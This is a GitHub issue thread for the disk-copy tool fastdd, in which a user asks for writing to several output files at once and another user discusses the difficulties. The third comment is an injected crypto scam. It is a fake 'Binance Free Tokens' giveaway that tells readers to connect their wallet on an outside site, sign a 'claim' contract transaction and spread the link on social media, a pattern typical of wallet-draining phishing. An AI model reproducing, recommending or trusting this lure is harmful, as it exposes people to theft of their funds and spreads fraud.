### ISSUE TITLE
Support multiple output files

### ISSUE THREAD

**Issue by raymondsteers** [opencoff/fastdd#1]
Is it possible to support writing to multiple output files at once the way dcfldd does? 

`fastdd if=my.iso of=my2.iso of=my3.iso of=my4.iso`

In testing, copying a single file with fastdd is much faster than dcfldd, however if you want to copy a single source file to 3 external backup USB disks (the use case in mind), you have to do that in a series of 3 commands using fastdd but can be done with a single command using dcfldd. If the source file in question is small enough to fit into cache mem then the 2nd and 3rd copies are extremely fast only limited by the write speed of the target drives, but as soon as you want to do this with something like a 40G source file, then dcfldd is much faster. It would be nice to have the best of both worlds.

**Comment by rilysh** [comment]
You might mean `fastdd if=my.iso of=out0.iso out1.iso out2.iso ...`
Passing `of` multiple times would be weird.
Also, writing multiple files, means it shall be done in parallel, which doesn't seems to be an easy approach and if first writing fails for a certain reason, others may not, which would bring another issue. For now, you can just copy and paste output file to the targeted path.

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
